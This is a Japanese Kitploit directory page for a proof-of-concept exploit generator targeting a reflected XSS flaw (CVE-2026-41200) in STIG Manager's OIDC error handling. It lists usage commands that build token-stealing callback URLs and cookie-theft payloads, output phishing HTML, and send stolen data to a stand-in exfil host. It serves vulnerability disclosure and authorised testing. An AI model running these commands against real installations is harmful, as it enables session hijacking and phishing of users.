Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2026-41200-stig-manager-oidc-reflected-xss — STIG Manager OIDC認証におけるReflected XSSの概念実証エクスプロイトジェネレーター。細工されたコールバックURLとフィッシングHTML出力によりセッショントークンの窃取を可能にする。 | Kitploit
ツール/GitHubGitHub/hunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss
フィッシングツール脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubhunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss

cve-2026-41200-stig-manager-oidc-reflected-xss

STIG Manager OIDC認証におけるReflected XSSの概念実証エクスプロイトジェネレーター。細工されたコールバックURLとフィッシングHTML出力によりセッショントークンの窃取を可能にする。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2ヶ月前未レビュー

CVE-2026-41200 — STIG Manager OIDC リフレクション型XSS PoC

STIG Manager バージョン 1.5.10 から 1.6.7 におけるリフレクション型クロスサイトスクリプティング(XSS)脆弱性の概念実証です。

脆弱性の概要

STIG Manager Web アプリの OIDC 認証エラーハンドリングコードにリフレクション型 XSS 脆弱性が存在します。OIDC プロバイダーから返される error および error_description クエリパラメータが、HTML エスケープなしで innerHTML を介して DOM に直接書き込まれます。悪意のある URL を作成し、ユーザーにその URL を踏ませることで、攻撃者はアプリケーションコンテキスト内で任意の JavaScript を実行できます。

この脆弱性は、標的のユーザーが別のブラウザタブでアクティブな STIG Manager セッションを持っている場合に最も深刻です。注入されたコードはアクセストークンを管理する SharedWorker と通信でき、被害者に代わって認証済み API リクエストが可能になります。

  • CVE: CVE-2026-41200
  • CVSS 4.0: 8.5 (HIGH)
  • 影響を受けるバージョン: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
  • 修正バージョン: v1.6.8
  • 勧告: GHSA-wg33-j3rv-jq72
  • 記事: hunt-benito.com

使用方法

root@kitploit:~
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html

# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com

免責事項

このツールは教育目的および許可されたセキュリティ研究のためだけに提供されます。

  • 自分が所有する、または明示的なテスト許可を得たインストールに対してのみ使用してください。
  • ほとんどの法域において、コンピュータシステムへの不正アクセスは違法です。
  • 著者は本ツールの誤用に対するいかなる責任も負いません。
ツールをダウンロード